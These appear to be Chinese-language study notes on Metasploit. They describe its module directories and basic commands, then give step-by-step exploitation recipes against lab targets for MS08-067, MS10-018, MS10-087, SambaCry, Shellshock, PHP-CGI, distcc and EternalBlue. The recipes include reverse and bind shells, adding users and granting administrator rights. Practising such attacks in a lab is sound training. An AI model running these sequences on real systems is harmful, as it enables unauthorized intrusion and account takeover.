MSF概述
Metasploit就是⼀个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是⼀个免 费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数 2000多个已知软件漏洞的专业级漏洞攻击⼯具
MSF⽬录结构解读
msf在kali虚拟机的存放⽬录:/usr/share/metasploit-framework/
Modules
Modules
:⽤户⽤到的各种模块⼏乎都在这⾥,⽤户使⽤use这个msf这⾥时,就是⽤到了这个⽬录下的模块。这个⽬录下的⽂件在msfconsole启动时会被⾃动加载的。
Auxiliary
:主要包含渗透
测试中⼀些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注⼊,漏洞挖掘等
Encoders
:各种编码⼯具 ⽤于躲过⼊侵检测和过滤系统。
Exploits
:主要包含了传说中的exp、0day、各种漏洞利⽤的脚本。主要的攻击代码全在这,这⾥边包含的exp的路径的命名规则是 系统/服务/模块,在使⽤exp是可以根据这个命名⽅法来找(也可以⽤search这条指令来找)。⽐如:use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)
Nops
: NOP (No Operation or Next Operation) sled,由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(⽐如针对溢出攻击),某些特殊的滑⾏字符串(NOPS x90x90…)则会因为被拦截⽽导致攻击失效,所以此时需要修改exploit中的NOPs.nops⽂件夹下的东⻄会在payload⽣成时⽤到(后⾯会有介绍)。⽐如我们打开php的NOPS⽣成脚本,就会发现它只是返回了指定⻓度的空格⽽已。
Payloads
:这个单词翻译过来叫载荷:是攻击者发送给系统执⾏的指令(不包含exploits攻击阶段),payloads主要是在⽬标机执⾏的,⽽exploits是在本地机执⾏作⽤于⽬标机。命名规则是: 系统/类型/名称 ⽐如: use payloads/windows/shell/bind_tcp
Post
: 这个⽬录⾥放着msf 的 exploits执⾏成功后,向⽬标机发送的⼀些功能性指令⽐如:提权,获取hash等。
Plugins
这⾥的模块⽤户需要使⽤load 来加载,提供数据库连接插件,和各种要⽤到的插件。
Scripts
这个⽬录下的⽂件⼤都是Meterpreter这个模块利⽤的脚本
Tools:
包含⼀些有⽤的脚本和零散的⼯具。
MSF基本命令
输入命令msfconsole启动

? 帮助命令
search 模块 搜索你要找的模块
use 模块 使用模块
back 从当前环境返回
connect IP地址 端口 连接⼀个主机的指定端口
info 模块 显示⼀个或多个模块的信息
jobs 显示和管理作业(和windows任务管理器的进程作⽤⼀样)
quit&exit 退出msf
MSF渗透测试
⽹络服务器攻击渗透(MS08-067)
1.msfconsole
2.use exploit/windows/smb/ms08_067_netapi
3.show options
4.set RHOST 192.168.244.7
5.run
6.shell
7.net user
8.net user test test /add
9.net user
10.net user test /del
漏洞技术原理
MS08-067详细原理:MS08-067漏洞原理及详尽分析过程 – FreeBuf网络安全行业门户
https://www.freebuf.com/vuls/203881.html2019-6-1
浏览器攻击渗透(MS10-018)
1.msfconsole
2.use exploit/windows/browser/ms10_018_ie_behaviors
3.set SRVHOST 192.168.244.4
(
kali
⾃⼰的
ip
)
4.set PAYLOAD windows/meterpreter/bind_tcp
5.set LPORT 4441
6.exploit -j
7.#
等待靶机执⾏
8.jobs
9.sessions
10.sessions -i 1
11.shell
漏洞技术原理
MS10-018详细原理:
浏览器攻击渗透MS10-018-CSDN博客
https://blog.csdn.net/weixin_47114294/article/details/146425289
应⽤软件格式渗透 利⽤word去渗透(MS10-087)
1.msfconsole
2.use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
3.set payload windows/exec
4.set CMD calc.exe
5.set FILENAME ceshi.rtf
6.run
漏洞技术原理
MS10-087详细原理:MS10_087漏洞学习研究 – 燃烧少年的心 – 博客园
https://www.cnblogs.com/justforfun12/p/5333528.html
利⽤samba服务漏洞深入Linux主机(CVE-2017-7494)
1.#vuehub
上使⽤
root
执⾏
2.cd /home/enjoy/vulhub-master/samba/CVE-2017-7494
3.docker-compose up -d
4.#kali
执⾏
5.msfconsole
6.use exploit/linux/samba/is_known_pipename
7.set RHOSTS 192.168.244.6 (wubangtuip)
8.run
9.id
漏洞技术原理
CVE-2017-7494漏洞详细原理:【漏洞分析】Samba远程代码执行漏洞(CVE-2017-7494)-SambaCry分析报告
https://www.suphp.cn/anquanke/81/86181.html
Bash Shellshock(破壳CVE-2014-6271)
1.#vuehub
上使⽤
root
执⾏
2.docker-compose down
3.cd /home/enjoy/vulhub-master/bash/shellshock
4.docker-compose build
5.docker-compose up -d
6.docker-compose config
7.#http://youip:8080/victim.cgi
8.#kali
执⾏
9.msfconsole
10.use exploit/multi/http/apache_mod_cgi_bash_env_exec
11.set RHOSTS 192.168.244.6 (vnt ip)
12.set RPORT 8080
13.set TARGETURI /victim.cgi
14.run
15.shell
16.id
漏洞技术原理
CVE-2014-6271漏洞详细原理:
CVE-2014-6271(shellshock破壳漏洞) – toby123 – 博客园
https://www.cnblogs.com/huangxiaosan/p/14243502.html
PHP CGI漏洞利⽤(CVE-2012-1823)
1.#vuehub
上使⽤
root
执⾏
2.docker-compose down
3.cd /home/enjoy/vulhub-master/php/CVE-2012-1823
4.docker-compose build
5.docker-compose up -d
6.docker-compose config
7.#
环境启动后,访问
`http://your-ip:8080/`
可⻅
“Hello”
字样。
8.#
访问
`http://your-ip:8080/index.php?-s`
即爆出源码,说明漏洞存在。发送如下数据包,
9.可⻅
Body
中的代码已被执⾏:
10.#kali
执⾏
11.msfconsole
12.use exploit/multi/http/php_cgi_arg_injection
13.set RHOSTS 192.168.244.6 (vb ip)
14.set RPORT 8080
15.run
16.shell
17.id
漏洞技术原理
CVE-2012-1823漏洞详细原理:
PHP-CGI远程代码执行漏洞(CVE-2012-1823) – AllFalls – 博客园
https://www.cnblogs.com/ForBreeze/articles/18045338
Distcc后⻔漏洞(CVE-2004-2678)
1.use exploit/unix/misc/distcc_exec
2.set payload cmd/unix/reverse_perl
3.set rhost 192.168.244.8 (ms ip) 192.168.153.137
4.set lhost 192.168.244.4 (kali
⾃⼰的
)192.168.153.132
5.exploit
(
run
也可以)
6.id
Metasploit永恒之蓝(ms17_010)
1.msfconsole
2.use exploit/windows/smb/ms17_010_eternalblue
3.set rhosts 192.168.209.129
4.set LHOST 0.0.0.0
5.set payload windows/x64/shell/bind_tcp
6.run
7.net user test test /add
8.net localgroup administrators test /add
9.net user
10.net user test /del
漏洞技术原理
MS17-010漏洞详细原理:
MS17-010 漏洞研究——免考课题 20155104 赵文昊 – 囚月 – 博客园
https://www.cnblogs.com/Qujinkongyuyin/p/9266958.html



